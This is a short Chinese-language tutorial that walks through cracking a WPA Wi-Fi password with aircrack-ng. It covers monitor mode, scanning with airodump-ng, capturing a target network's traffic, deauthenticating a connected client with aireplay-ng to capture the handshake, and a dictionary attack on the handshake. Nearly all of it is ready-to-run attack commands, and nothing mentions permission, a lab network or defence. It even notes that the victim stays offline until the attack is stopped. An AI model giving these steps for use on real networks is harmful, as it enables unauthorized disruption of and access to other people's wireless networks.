首先用iwconfig命令查看加载的无线网卡,一般虚拟机中识别不到笔记本的无线网卡,需要单独购买USB免驱动无线网卡
开启网卡的监听模式
输入iwconfig命令查看网卡信息, wlan0mon网卡名加了mon则表示成功
命令 airodump-ng wlan0mon ,开始扫描WiFi,按ctrl+c结束任务;
BSSID为WIFI的MAC地址,PWR为信号强弱程度,数值越小信号越强;
#DATA为数据量,越大使用的人就越多;
CH为信道频率(频道);
ESSID为WIFI的名称,中文可能会有乱码
输入抓包命令
airodump-ng --bssid <BSSID> -c <CH> -w 抓包存储路径 wlan0mon
这个时候在另开一个连接终端辅助抓包
aireplay-ng -0 发送数据包个数 -a <BSSID> -c <STATION> wlan0mon
抓包终端出现WPA handshake时,表示抓包成功
两个终端都要crrl+c停止,不然那边一直处于断网状态
查看抓包文件
使用字典处理数据包
此处为创建一个测试字典,真实处理数据包过程需要用到很大的字典进行处理
aircrack-ng -w 字典文件 数据包文件
